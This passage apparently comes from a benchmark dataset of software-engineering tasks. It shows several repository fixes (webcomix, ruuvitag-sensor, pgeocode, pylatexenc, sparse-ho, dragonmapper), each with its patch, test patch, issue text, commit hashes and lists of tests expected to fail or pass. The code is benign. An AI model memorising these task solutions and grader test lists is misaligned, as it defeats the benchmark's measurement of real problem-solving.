+ comparator=lambda exp, act: compare_python(exp, act, self.env.expected_path('issues_368_imports.py')),
+ value_is_returned=True)
+ env.generate_single_file('issue_368.py',
+ lambda: PythonGenerator(env.input_path('issue_368.yaml'),
+ mergeimports=False).serialize(),
+ comparator=lambda exp, act: compare_python(exp, act, self.env.expected_path('issue_368.py')),
+ value_is_returned=True)
+ with open(env.expected_path('issue_368.py')) as f:
+ python= f.read()
+
+ has_imports = False
+ for line in python.split("\n"):
+ if line.startswith("from . issues_368_imports"):
+ imps = line.replace("from . issues_368_imports import ","").split(", ")
+ assert 'E' in imps
+ assert 'ParentClass' in imps
+ has_imports = True
+ assert has_imports
+ module = compile_python(env.expected_path('issue_368.py'))
+
+ enum_inst = module.E("a") # EnumInstanceImpl
+ example = module.C(s="a")
+ assert hasattr(example, "s")
+ assert example.s.code.text == enum_inst.code.text
+ assert str(example.s) == "a: A"
+ def output_generator(dirname) -> None:
+ with open(os.path.join(dirname, 'issue_368_1.json'), 'w') as f:
+ f.write(as_json(example))
+
+ # TODO: fix this
+ # env.generate_directory('issue_368', lambda dirname: output_generator(dirname))
+
+
+if __name__ == '__main__':
+ unittest.main()
|
enums are not imported in generated python code
E.g
```yaml
id: https://microbiomedata/schema
prefixes:
biolinkml: https://w3id.org/biolink/biolinkml/
imports:
- biolinkml:types
- issues_368_imports
classes:
c:
is_a: parent_class
slots:
- s
slots:
s:
range: e
```
where the imported file is:
```yaml
id: https://microbiomedata/schema/mixs
classes:
parent_class: {}
enums:
e:
permissible_values:
a: A
b: B
```
```bash
$ gen-python --no-mergeimports tests/test_issues/input/issue_368.yaml
```
makes:
```python
...
from . issues_368_imports import ParentClass
...
```
but the python should also import `E`
|
0.0
|
0b62bffabb4938208703acac990a6b2b6461fa7e
|
[
"tests/test_issues/test_issue_368.py::Issue368TestCase::test_issue_368"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-02-16 18:12:42+00:00
|
cc0-1.0
| 1,389
|
|
J-CPelletier__webcomix-7
|
diff --git a/webcomix/main.py b/webcomix/main.py
index 0053bbb..cba546d 100644
--- a/webcomix/main.py
+++ b/webcomix/main.py
@@ -56,7 +56,12 @@ def download(name, cbz):
default=False,
is_flag=True,
help="Outputs the comic as a cbz file")
-def search(name, start_url, cbz):
+@click.option(
+ "-y",
+ default=False,
+ is_flag=True,
+ help="Assumes 'yes' as an answer to all prompts")
+def search(name, start_url, cbz, y):
"""
Downloads a webcomic using a general XPath
"""
@@ -67,8 +72,8 @@ def search(name, start_url, cbz):
comic.comic_image_selector)
print_verification(validation)
click.echo(
- "Verify that the links above are correct before proceeding.")
- if click.confirm("Are you sure you want to proceed?"):
+ "Verify that the links above are correct.")
+ if y or click.confirm("Are you sure you want to proceed?"):
comic.download(name)
if cbz:
comic.make_cbz(name, name)
@@ -100,7 +105,12 @@ def search(name, start_url, cbz):
default=False,
is_flag=True,
help="Outputs the comic as a cbz file")
-def custom(comic_name, start_url, next_page_xpath, image_xpath, cbz):
+@click.option(
+ "-y",
+ default=False,
+ is_flag=True,
+ help="Assumes 'yes' as an answer to all prompts")
+def custom(comic_name, start_url, next_page_xpath, image_xpath, cbz, y):
"""
Downloads a user-defined webcomic
"""
@@ -109,8 +119,8 @@ def custom(comic_name, start_url, next_page_xpath, image_xpath, cbz):
comic.next_page_selector,
comic.comic_image_selector)
print_verification(validation)
- click.echo("Verify that the links above are correct before proceeding.")
- if click.confirm("Are you sure you want to proceed?"):
+ click.echo("Verify that the links above are correct.")
+ if y or click.confirm("Are you sure you want to proceed?"):
comic.download(comic_name)
if cbz:
comic.make_cbz(comic_name, comic_name)
|
J-CPelletier/webcomix
|
25d394314ce26816302e9c878f5cebfb853c16fb
|
diff --git a/webcomix/tests/test_main.py b/webcomix/tests/test_main.py
index ec2c718..c2dcf42 100644
--- a/webcomix/tests/test_main.py
+++ b/webcomix/tests/test_main.py
@@ -100,7 +100,7 @@ def test_custom(monkeypatch):
assert result.exit_code == 0
assert result.output.strip() == "\n".join([
"Verified", "Printed",
- "Verify that the links above are correct before proceeding.",
+ "Verify that the links above are correct.",
"Are you sure you want to proceed? [y/N]: yes", "foo"
])
@@ -119,7 +119,7 @@ def test_custom_make_cbz(monkeypatch):
assert result.exit_code == 0
assert result.output.strip() == "\n".join([
"Verified", "Printed",
- "Verify that the links above are correct before proceeding.",
+ "Verify that the links above are correct.",
"Are you sure you want to proceed? [y/N]: y", "foo", ".cbz created"
])
@@ -139,6 +139,6 @@ def test_search(monkeypatch):
assert result.exit_code == 0
assert result.output.strip() == "\n".join([
"Verified", "Printed",
- "Verify that the links above are correct before proceeding.",
+ "Verify that the links above are correct.",
"Are you sure you want to proceed? [y/N]: y", "foo"
])
|
Custom: Add a -y (yes) option
Looking to use this as a replacement for Dosage, as this allows for custom comics. I'd like to run this daily (or every few days) on a number of comics to pull latest comic. The prompting on Custom Comics (are you sure) is a stumbling block to script it. Can you maybe add a -y to custom, for auto-acknowledging?
|
0.0
|
25d394314ce26816302e9c878f5cebfb853c16fb
|
[
"webcomix/tests/test_main.py::test_custom",
"webcomix/tests/test_main.py::test_custom_make_cbz",
"webcomix/tests/test_main.py::test_search"
] |
[
"webcomix/tests/test_main.py::test_print_verification",
"webcomix/tests/test_main.py::test_comics",
"webcomix/tests/test_main.py::test_good_download",
"webcomix/tests/test_main.py::test_bad_download",
"webcomix/tests/test_main.py::test_good_download_makecbz",
"webcomix/tests/test_main.py::test_bad_download_make_cbz"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-07-27 20:03:35+00:00
|
mit
| 298
|
|
ttu__ruuvitag-sensor-41
|
diff --git a/ruuvitag_sensor/ruuvi.py b/ruuvitag_sensor/ruuvi.py
index ffd6bc6..0dffc62 100644
--- a/ruuvitag_sensor/ruuvi.py
+++ b/ruuvitag_sensor/ruuvi.py
@@ -202,13 +202,12 @@ class RuuviTagSensor(object):
Returns:
string: Sensor data
"""
+ # Search of FF990403 (Manufacturer Specific Data (FF) / Ruuvi Innovations ltd (9904) / Format 3 (03))
try:
- if len(raw) != 54:
+ if "FF990403" not in raw:
return None
- if raw[16:18] != '03':
- return None
-
- return raw[16:]
+ payload_start = raw.index("FF990403") + 6;
+ return raw[payload_start:]
except:
return None
|
ttu/ruuvitag-sensor
|
c0d986391149d31d60d9649cfd9f3946db92a50c
|
diff --git a/tests/test_decoder.py b/tests/test_decoder.py
index cd92d1d..639b71a 100644
--- a/tests/test_decoder.py
+++ b/tests/test_decoder.py
@@ -51,6 +51,16 @@ class TestDecoder(TestCase):
self.assertNotEqual(data['acceleration_y'], 0)
self.assertNotEqual(data['acceleration_z'], 0)
+ data = decoder.decode_data('03291A1ECE1EFC18F94202CA0B53BB')
+ self.assertEqual(data['temperature'], 26.3)
+ self.assertEqual(data['pressure'], 1027.66)
+ self.assertEqual(data['humidity'], 20.5)
+ self.assertEqual(data['battery'], 2899)
+ self.assertNotEqual(data['acceleration'], 0)
+ self.assertEqual(data['acceleration_x'], -1000)
+ self.assertNotEqual(data['acceleration_y'], 0)
+ self.assertNotEqual(data['acceleration_z'], 0)
+
def test_df3decode_is_valid_max_values(self):
decoder = Df3Decoder()
humidity = 'C8'
diff --git a/tests/test_ruuvitag_sensor.py b/tests/test_ruuvitag_sensor.py
index ac9e3bb..16fcbc0 100644
--- a/tests/test_ruuvitag_sensor.py
+++ b/tests/test_ruuvitag_sensor.py
@@ -47,7 +47,8 @@ class TestRuuviTagSensor(TestCase):
('CC:2C:6A:1E:59:3D', '1E0201060303AAFE1616AAFE10EE037275752E76692F23416A7759414D4663CD'),
('DD:2C:6A:1E:59:3D', '1E0201060303AAFE1616AAFE10EE037275752E76692F23416A7759414D4663CD'),
('EE:2C:6A:1E:59:3D', '1F0201060303AAFE1716AAFE10F9037275752E76692F23416A5558314D417730C3'),
- ('FF:2C:6A:1E:59:3D', '1902010415FF990403291A1ECE1E02DEF94202CA0B5300000000BB')
+ ('FF:2C:6A:1E:59:3D', '1902010415FF990403291A1ECE1E02DEF94202CA0B5300000000BB'),
+ ('00:2C:6A:1E:59:3D', '1902010415FF990403291A1ECE1E02DEF94202CA0B53BB')
]
for data in datas:
@@ -59,7 +60,7 @@ class TestRuuviTagSensor(TestCase):
get_datas)
def test_find_tags(self):
tags = RuuviTagSensor.find_ruuvitags()
- self.assertEqual(5, len(tags))
+ self.assertEqual(6, len(tags))
@patch('ruuvitag_sensor.ble_communication.BleCommunicationDummy.get_datas',
get_datas)
@@ -87,7 +88,7 @@ class TestRuuviTagSensor(TestCase):
def test_get_datas(self):
datas = []
RuuviTagSensor.get_datas(lambda x: datas.append(x))
- self.assertEqual(5, len(datas))
+ self.assertEqual(6, len(datas))
@patch('ruuvitag_sensor.ble_communication.BleCommunicationDummy.get_datas',
get_datas)
|
Bug: incompatible with RuuviFW 1.2.8
The 1.2.8 update to Ruuvi Firmware trims extra NULLs at the end of transmission which breaks the data format type check. I can fix this and implement #29 .
|
0.0
|
c0d986391149d31d60d9649cfd9f3946db92a50c
|
[
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_find_tags",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_get_datas"
] |
[
"tests/test_decoder.py::TestDecoder::test_decode_is_valid",
"tests/test_decoder.py::TestDecoder::test_decode_is_valid_case2",
"tests/test_decoder.py::TestDecoder::test_decode_is_valid_weatherstation_2017_04_12",
"tests/test_decoder.py::TestDecoder::test_df3decode_is_valid",
"tests/test_decoder.py::TestDecoder::test_df3decode_is_valid_max_values",
"tests/test_decoder.py::TestDecoder::test_df3decode_is_valid_min_values",
"tests/test_decoder.py::TestDecoder::test_getcorrectdecoder",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_convert_data_not_valid",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_false_mac_raise_error",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_get_data_for_sensors",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_get_datas_with_macs",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_tag_correct_properties",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_tag_update_is_valid"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_issue_reference"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-04-19 15:39:25+00:00
|
mit
| 6,104
|
|
symerio__pgeocode-62
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 683a3c0..088341d 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,12 @@
- The minimum supported Python version is updated to Python 3.8
[#65](https://github.com/symerio/pgeocode/pull/65)
+ - Fix error in latitude grouping when creating a unique postcode index.
+ With this fix `Nominatim(.., unique=True)` correctly computes the average
+ latitude for each postcode (if multiple localities share the same postcode),
+ instead of taking the first latitude value.
+ [#62](https://github.com/symerio/pgeocode/pull/62)
+
- The default folder to store downloaded data is changed to `~/.cache/pgeocode/`.
This default can still be changed by setting the `PGEOCODE_DATA_DIR` environment variable.
[#51](https://github.com/symerio/pgeocode/pull/51)
diff --git a/pgeocode.py b/pgeocode.py
index 65f8ffd..4f9aab3 100644
--- a/pgeocode.py
+++ b/pgeocode.py
@@ -252,7 +252,7 @@ class Nominatim:
df_unique_cp_group = self._data.groupby("postal_code")
data_unique = df_unique_cp_group[["latitude", "longitude"]].mean()
valid_keys = set(DATA_FIELDS).difference(
- ["place_name", "lattitude", "longitude", "postal_code"]
+ ["place_name", "latitude", "longitude", "postal_code"]
)
data_unique["place_name"] = df_unique_cp_group["place_name"].apply(
lambda x: ", ".join([str(el) for el in x])
|
symerio/pgeocode
|
fda231859ae17c7282a9d90c0e2b5b3cde1eb01d
|
diff --git a/test_pgeocode.py b/test_pgeocode.py
index b6fe453..1bfdcbf 100644
--- a/test_pgeocode.py
+++ b/test_pgeocode.py
@@ -261,3 +261,60 @@ def test_first_url_fails(httpserver, monkeypatch, temp_dir):
with pytest.warns(UserWarning, match=msg):
Nominatim("ie")
httpserver.check_assertions()
+
+
+def test_unique_index_pcode(tmp_path):
+ """Check that a centroid is computed both for latitude and longitude
+
+ Regression test for https://github.com/symerio/pgeocode/pull/62
+ """
+
+ class MockNominatim(Nominatim):
+ def __init__(self):
+ pass
+
+ data = pd.DataFrame(
+ {
+ "postal_code": ["1", "1", "2", "2"],
+ "latitude": [1.0, 2.0, 3.0, 4],
+ "longitude": [5.0, 6.0, 7.0, 8],
+ "place_name": ["a", "b", "c", "d"],
+ "state_name": ["a", "b", "c", "d"],
+ "country_name": ["a", "b", "c", "d"],
+ "county_name": ["a", "b", "c", "d"],
+ "community_name": ["a", "b", "c", "d"],
+ "accuracy": [1, 2, 3, 4],
+ "country_code": [1, 2, 3, 4],
+ "county_code": [1, 2, 3, 4],
+ "state_code": [1, 2, 3, 4],
+ "community_code": [1, 2, 3, 4],
+ }
+ )
+
+ nominatim = MockNominatim()
+ data_path = tmp_path / "a.txt"
+ nominatim._data_path = str(data_path)
+ nominatim._data = data
+ data_unique = nominatim._index_postal_codes()
+
+ data_unique_expected = pd.DataFrame(
+ {
+ "postal_code": ["1", "2"],
+ "latitude": [1.5, 3.5],
+ "longitude": [5.5, 7.5],
+ "place_name": ["a, b", "c, d"],
+ "state_name": ["a", "c"],
+ # We don't include the country_name for some reason?
+ # 'country_name': ['a', 'c'],
+ "county_name": ["a", "c"],
+ "community_name": ["a", "c"],
+ "accuracy": [1, 3],
+ "country_code": [1, 3],
+ "county_code": [1, 3],
+ "state_code": [1, 3],
+ "community_code": [1, 3],
+ }
+ )
+ pd.testing.assert_frame_equal(
+ data_unique.sort_index(axis=1), data_unique_expected.sort_index(axis=1)
+ )
|
incorrect centroid in query_postal_code for duplicate postal code entries
query_postal_code sums the longitude.
nomi.query_postal_code("41-800")
Thats from GEOName file:
41-800 will return you 2 locations:
PL, 41-800, 50.2817, 18.6745
PL,41-800, 50.3055, 18.778
After running: nomi.query_postal_code("41-800")
postal_code 41-800
place_name Gliwice, Zabrze
latitude 50.2817
longitude 18.7263
and the longitude = SUM of the locations from file / number of results.
|
0.0
|
fda231859ae17c7282a9d90c0e2b5b3cde1eb01d
|
[
"test_pgeocode.py::test_unique_index_pcode"
] |
[
"test_pgeocode.py::test_countries[FR-91120-Palaiseau-67000-Strasbourg-400]",
"test_pgeocode.py::test_countries[GB-WC2N",
"test_pgeocode.py::test_countries[AU-6837-Perth-3000-melbourne-2722]",
"test_pgeocode.py::test_countries[AU-6837-Perth-0221-Barton-3089]",
"test_pgeocode.py::test_countries[US-60605-Chicago-94103-San",
"test_pgeocode.py::test_countries[CA-M5R",
"test_pgeocode.py::test_download_dataset",
"test_pgeocode.py::test_nominatim_query_postal_code",
"test_pgeocode.py::test_nominatim_query_postal_code_multiple",
"test_pgeocode.py::test_nominatim_distance_postal_code",
"test_pgeocode.py::test_cdn[geonames]",
"test_pgeocode.py::test_cdn[gitlab-pages]"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-06-16 08:54:33+00:00
|
bsd-3-clause
| 5,821
|
|
phfaist__pylatexenc-4
|
diff --git a/pylatexenc/latex2text.py b/pylatexenc/latex2text.py
index 874ae8d..da2694e 100644
--- a/pylatexenc/latex2text.py
+++ b/pylatexenc/latex2text.py
@@ -23,11 +23,17 @@
#
+from __future__ import print_function, absolute_import
import os
import re
import unicodedata
-import latexwalker
import logging
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
+
+from pylatexenc import latexwalker
logger = logging.getLogger(__name__);
@@ -498,7 +504,7 @@ class LatexNodes2Text(object):
#
if (len(n.nodeargs) != 1):
- logger.warning(ur"Expected exactly one argument for '\input' ! Got = %r", n.nodeargs)
+ logger.warning(u"Expected exactly one argument for '\\input' ! Got = %r", n.nodeargs)
inputtex = self.read_input_file(self.nodelist_to_text([n.nodeargs[0]]).strip())
@@ -663,17 +669,17 @@ if __name__ == '__main__':
import fileinput
- print "Please type some latex text (Ctrl+D twice to stop) ..."
+ print("Please type some latex text (Ctrl+D twice to stop) ...")
latex = ''
for line in fileinput.input():
latex += line;
- print '\n--- WORDS ---\n'
- print latex2text(latex.decode('utf-8')#, keep_inline_math=True
- ).encode('utf-8')
- print '\n-------------\n'
+ print('\n--- WORDS ---\n')
+ print(latex2text(latex.decode('utf-8')#, keep_inline_math=True
+ ).encode('utf-8'))
+ print('\n-------------\n')
except:
import pdb;
@@ -681,8 +687,8 @@ if __name__ == '__main__':
import sys;
(exc_type, exc_value, exc_traceback) = sys.exc_info()
- print "\nEXCEPTION: " + unicode(sys.exc_value) + "\n"
-
+ print("\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n")
+
pdb.post_mortem()
diff --git a/pylatexenc/latexencode.py b/pylatexenc/latexencode.py
index 0b54878..98b87fb 100644
--- a/pylatexenc/latexencode.py
+++ b/pylatexenc/latexencode.py
@@ -24,8 +24,13 @@
#
+from __future__ import print_function, absolute_import
import unicodedata;
import logging
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
log = logging.getLogger(__name__)
@@ -873,20 +878,20 @@ if __name__ == '__main__':
import fileinput
- print "Please type some unicode text (Ctrl+D twice to stop) ..."
+ print("Please type some unicode text (Ctrl+D twice to stop) ...")
latex = ''
for line in fileinput.input():
latex += line;
- print '\n--- LATEX ---\n'
- print utf8tolatex(latex.decode('utf-8')).encode('utf-8')
- print '\n-------------\n'
+ print('\n--- LATEX ---\n')
+ print(utf8tolatex(latex.decode('utf-8')).encode('utf-8'))
+ print('\n-------------\n')
except:
import pdb;
import sys;
- print "\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n"
+ print("\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n")
pdb.post_mortem()
diff --git a/pylatexenc/latexwalker.py b/pylatexenc/latexwalker.py
index eef3e4b..7fcbe3f 100644
--- a/pylatexenc/latexwalker.py
+++ b/pylatexenc/latexwalker.py
@@ -23,12 +23,16 @@
#
+from __future__ import print_function, absolute_import
import logging
logger = logging.getLogger(__name__)
import re
from collections import namedtuple
-
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
class LatexWalkerError(Exception):
@@ -1223,9 +1227,9 @@ def disp_node(n, indent=0, context='* ', skip_group=False):
title = '\\begin{%s}' %(n.envname)
iterchildren.append(('* ', n.nodelist, False));
else:
- print "UNKNOWN NODE TYPE: %s"%(n.nodeType().__name__)
+ print("UNKNOWN NODE TYPE: %s"%(n.nodeType().__name__))
- print ' '*indent + context + title + ' '+comment
+ print(' '*indent + context + title + ' '+comment)
for context, nodelist, skip in iterchildren:
for nn in nodelist:
@@ -1252,18 +1256,18 @@ if __name__ == '__main__':
(nodes, pos, llen) = get_latex_nodes(latex);
- print '\n--- NODES ---\n'
- print repr(nodes);
- print '\n-------------\n'
+ print('\n--- NODES ---\n')
+ print(repr(nodes))
+ print('\n-------------\n')
- print '\n--- NODES ---\n'
+ print('\n--- NODES ---\n')
for n in nodes:
disp_node(n)
- print '\n-------------\n'
+ print('\n-------------\n')
except:
import pdb;
import sys;
- print "\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n"
+ print("\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n")
pdb.post_mortem()
|
phfaist/pylatexenc
|
9919400250e204e7990821210c8c0035bede2eaa
|
diff --git a/test/test_latexwalker.py b/test/test_latexwalker.py
index 5acf7d3..2be6f0f 100644
--- a/test/test_latexwalker.py
+++ b/test/test_latexwalker.py
@@ -1,4 +1,8 @@
import unittest
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
from pylatexenc.latexwalker import (
MacrosDef, LatexWalker, LatexToken, LatexCharsNode, LatexGroupNode, LatexCommentNode,
|
ur"Expected exactly (...)" string gives SyntaxError: invalid syntax
Got syntax error when importing ```pylatexenc.latex2text``` module (Python 3.6, Mac, Anaconda3 distrubution):
```
import pylatexenc.latex2text
File "/Users/rasmus/anaconda/envs/tts/lib/python3.6/site-packages/pylatexenc/latex2text.py", line 501
logger.warning(ur"Expected exactly one argument for '\input' ! Got = %r", n.nodeargs)
^
SyntaxError: invalid syntax
```
Python 3.5+ does not support `ur` prefix. To fix, use either `u` or `r` string but not both.
|
0.0
|
9919400250e204e7990821210c8c0035bede2eaa
|
[
"test/test_latexwalker.py::TestLatexWalker::test_errors",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_braced_group",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_environment",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_expression",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_maybe_optional_arg",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_nodes",
"test/test_latexwalker.py::TestLatexWalker::test_get_token"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-02-16 22:40:59+00:00
|
mit
| 4,534
|
|
QB3__sparse-ho-67
|
diff --git a/doc/api.rst b/doc/api.rst
index 6cde70a..55810a7 100644
--- a/doc/api.rst
+++ b/doc/api.rst
@@ -44,7 +44,7 @@ Criterion
:toctree: generated/
HeldOutMSE
- SmoothedSURE
+ FiniteDiffMonteCarloSure
HeldOutLogistic
diff --git a/sparse_ho/criterion/__init__.py b/sparse_ho/criterion/__init__.py
index 1402e4e..8e96d7e 100644
--- a/sparse_ho/criterion/__init__.py
+++ b/sparse_ho/criterion/__init__.py
@@ -1,11 +1,11 @@
from sparse_ho.criterion.held_out import HeldOutMSE, HeldOutLogistic
from sparse_ho.criterion.cross_val import CrossVal
-from sparse_ho.criterion.sure import SmoothedSURE
+from sparse_ho.criterion.sure import FiniteDiffMonteCarloSure
from sparse_ho.criterion.held_out import HeldOutSmoothedHinge
from sparse_ho.criterion.multiclass_logreg import LogisticMulticlass
__all__ = ['CrossVal',
- 'SmoothedSURE',
+ 'FiniteDiffMonteCarloSure',
'HeldOutMSE',
'HeldOutLogistic',
'HeldOutSmoothedHinge',
diff --git a/sparse_ho/criterion/sure.py b/sparse_ho/criterion/sure.py
index 3719b75..980ad11 100644
--- a/sparse_ho/criterion/sure.py
+++ b/sparse_ho/criterion/sure.py
@@ -5,7 +5,7 @@ from sparse_ho.algo.forward import get_beta_jac_iterdiff
from sparse_ho.criterion.base import BaseCriterion
-class SmoothedSURE(BaseCriterion):
+class FiniteDiffMonteCarloSure(BaseCriterion):
"""Smoothed version of the Stein Unbiased Risk Estimator (SURE).
Implements the iterative Finite-Difference Monte-Carlo approximation of the
|
QB3/sparse-ho
|
59197a06f2ba62b4fd67b9d8950dc62674eed2a1
|
diff --git a/sparse_ho/tests/test_grad_search.py b/sparse_ho/tests/test_grad_search.py
index 492c04b..a8537f7 100644
--- a/sparse_ho/tests/test_grad_search.py
+++ b/sparse_ho/tests/test_grad_search.py
@@ -10,7 +10,7 @@ from sparse_ho.models import Lasso
from sparse_ho import Forward
from sparse_ho import ImplicitForward
from sparse_ho import Implicit
-from sparse_ho.criterion import HeldOutMSE, SmoothedSURE
+from sparse_ho.criterion import HeldOutMSE, FiniteDiffMonteCarloSure
from sparse_ho.ho import grad_search
from sparse_ho.optimizers import LineSearch
@@ -64,7 +64,7 @@ def test_grad_search(model, crit):
criterion = HeldOutMSE(idx_train, idx_val)
else:
n_outer = 2
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
# TODO MM@QBE if else scheme surprising
criterion = HeldOutMSE(idx_train, idx_val)
diff --git a/sparse_ho/tests/test_grid_search.py b/sparse_ho/tests/test_grid_search.py
index 2e1d6c6..4df0ff7 100644
--- a/sparse_ho/tests/test_grid_search.py
+++ b/sparse_ho/tests/test_grid_search.py
@@ -6,7 +6,7 @@ from sparse_ho.utils import Monitor
from sparse_ho.datasets import get_synt_data
from sparse_ho.models import Lasso
from sparse_ho import Forward
-from sparse_ho.criterion import HeldOutMSE, SmoothedSURE
+from sparse_ho.criterion import HeldOutMSE, FiniteDiffMonteCarloSure
from sparse_ho.grid_search import grid_search
@@ -69,7 +69,7 @@ def test_grid_search():
monitor_grid = Monitor()
model = Lasso(estimator=estimator)
- criterion = SmoothedSURE(sigma=sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma=sigma_star)
algo = Forward()
log_alpha_opt_grid, _ = grid_search(
algo, criterion, model, X, y, log_alpha_min, log_alpha_max,
@@ -77,7 +77,7 @@ def test_grid_search():
tol=1e-5, samp="grid")
monitor_random = Monitor()
- criterion = SmoothedSURE(sigma=sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma=sigma_star)
algo = Forward()
log_alpha_opt_random, _ = grid_search(
algo, criterion, model, X, y, log_alpha_min, log_alpha_max,
diff --git a/sparse_ho/tests/test_lasso.py b/sparse_ho/tests/test_lasso.py
index 8852e2d..8553435 100644
--- a/sparse_ho/tests/test_lasso.py
+++ b/sparse_ho/tests/test_lasso.py
@@ -13,7 +13,7 @@ from sparse_ho import Forward
from sparse_ho import ImplicitForward
from sparse_ho import Implicit
from sparse_ho import Backward
-from sparse_ho.criterion import HeldOutMSE, SmoothedSURE
+from sparse_ho.criterion import HeldOutMSE, FiniteDiffMonteCarloSure
n_samples = 100
n_features = 100
@@ -160,22 +160,22 @@ def test_val_grad():
for key in models.keys():
log_alpha = dict_log_alpha[key]
model = models[key]
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = Forward()
val_fwd, grad_fwd = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = ImplicitForward(tol_jac=1e-8, n_iter_jac=5000)
val_imp_fwd, grad_imp_fwd = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = Implicit(criterion)
val_imp, grad_imp = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = Backward()
val_bwd, grad_bwd = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
|
SURE naming / API / generalization
Consider renaming `SURE` to something more in adequation with the
implementation. The current implementation follows [(Figure 3, Deledalle et al. 2020)](https://samuelvaiter.com/publications/deledalle2014sugar.pdf) by
implementing a smoothed version using Finite Difference Monte Carlo (FDMC)
method. A user testing the class might be confused to see that in low dimension,
a SURE implemented manually does not provide the same value as our `SURE` class.
I believe there is three possible options:
1. _Keep the current name._ This is probably the best way to not confuse people
not familiar with the SURE. But in this case the documentation should reflect
precisely why a user could observe a difference with a handcraft SURE.
2. _Change the name to one relevant to the litterature._ The more exact would be
to use `FdmcSure` but this is a bit obscure for people and
`FiniteDifferenceMonteCarloSure` maybe too explicit. Another option is to use
SUGAR as it is easy to search. The issue is that SUGAR relates to the
gradient of the criterion, which could be also confusing.
3. _Change the name to something clearer._ Maybe a `Smooth[ed]Sure` could be a
candidate, but this is not a terminology which appears in papers.
### Parameters
- I don't understand why `SURE` takes `X_test` and `X_test` as parameters.
- Regarding `C` and `gamma_sure`. I believe it is not useful to expose them as
parameters. Either the user does not want to play with it and two optional
parameters are too much, or he really wants to control the finite difference
step and it would be easier to directly access the member `epsilon`. The power
law is advocated in the SUGAR paper, but different strategies could be used.
### Generalised SURE
It does not seem to be a priority, but this class could implements
generalization of the SURE to approximate the prediction risk and/or estimation
risk depending on the properties of `X`, which could be of interest for some use
(imaging for instance).
WDYT?
|
0.0
|
59197a06f2ba62b4fd67b9d8950dc62674eed2a1
|
[
"sparse_ho/tests/test_grid_search.py::test_grid_search"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-01-11 11:34:40+00:00
|
bsd-3-clause
| 570
|
|
tsroten__dragonmapper-24
|
diff --git a/dragonmapper/data/transcriptions.csv b/dragonmapper/data/transcriptions.csv
index 6447017..072be78 100644
--- a/dragonmapper/data/transcriptions.csv
+++ b/dragonmapper/data/transcriptions.csv
@@ -234,6 +234,7 @@ nun,ㄋㄨㄣ,nwən
nuo,ㄋㄨㄛ,nwɔ
nü,ㄋㄩ,ny
nüe,ㄋㄩㄝ,nɥœ
+o,ㄛ,ɔ
ou,ㄡ,oʊ
pa,ㄆㄚ,pʰa
pai,ㄆㄞ,pʰaɪ
|
tsroten/dragonmapper
|
0f58b30f65718494afb1de9cb25d68d5b3246a0f
|
diff --git a/dragonmapper/tests/test-transcriptions.py b/dragonmapper/tests/test-transcriptions.py
index a4d5e14..04a5733 100644
--- a/dragonmapper/tests/test-transcriptions.py
+++ b/dragonmapper/tests/test-transcriptions.py
@@ -173,3 +173,9 @@ class TestConvertFunctions(unittest.TestCase):
numbered = 'Ao4di4li4'
self.assertEqual(numbered, trans.accented_to_numbered(accented))
+
+ def test_issue_23(self):
+ pinyin = 'ó'
+ zhuyin = 'ㄛˊ'
+
+ self.assertEqual(zhuyin, trans.pinyin_to_zhuyin(pinyin))
|
Pinyin/Zhuyin/IPA syllable `o` is missing.
```python
>>> print(transcriptions.pinyin_to_zhuyin(ó))
Traceback (most recent call last):
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 100, in <module>
